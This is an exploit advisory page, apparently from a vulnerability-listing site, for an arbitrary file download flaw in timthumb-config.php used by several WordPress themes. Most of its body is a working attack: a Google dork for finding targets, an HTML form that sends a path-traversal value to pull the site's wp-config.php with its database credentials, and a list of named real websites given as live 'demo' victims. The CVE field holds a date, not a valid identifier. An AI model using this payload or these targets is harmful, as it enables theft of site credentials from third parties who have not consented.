Wordpress Themes Arbitrary File Download timthumb-config.php Vulnerability

2016.08.29
Credit: hacker.khan
Risk: Medium
Local: No
Remote: Yes
CVE: 2016-08-27

########################## # Exploit Title: Wordpress Themes Arbitrary File Download timthumb-config.php Vulnerability # Google Dork : wp-content/themes/lib/timthumb-config.php # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # Tested on : Windows7 ########################## # Wordpress Multi Themes Arbitrary File Download an Exploit Allow Attackers to Download # Files From Your Website and The Vulnerable File is : timthumb-config.php # so Any Theme Wordpress Has This File Then he is Potentially Vulnerable ###################### Exploit : www.site.com//wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php ##################### <html> <body> <form action="http://www.site.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php" method="post"> Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br> <input type="submit"> </form> </body> </html>> ############################## Demo : http://stepsandwings.net/wp-content/themes/infocus/lib/scripts/timthumb/timthumb-config.php http://www.aimmachines.com//wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php http://www.deepwebtech.com/wp-content/themes/awake/lib/scripts/timthumb/timthumb-config.php http://clarksonjewelers.com/wp-content/themes/elegance/lib/scripts/timthumb/timthumb-config.php ################################### #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd ||Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan

References:

hacker.khan@xtra.co.nz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top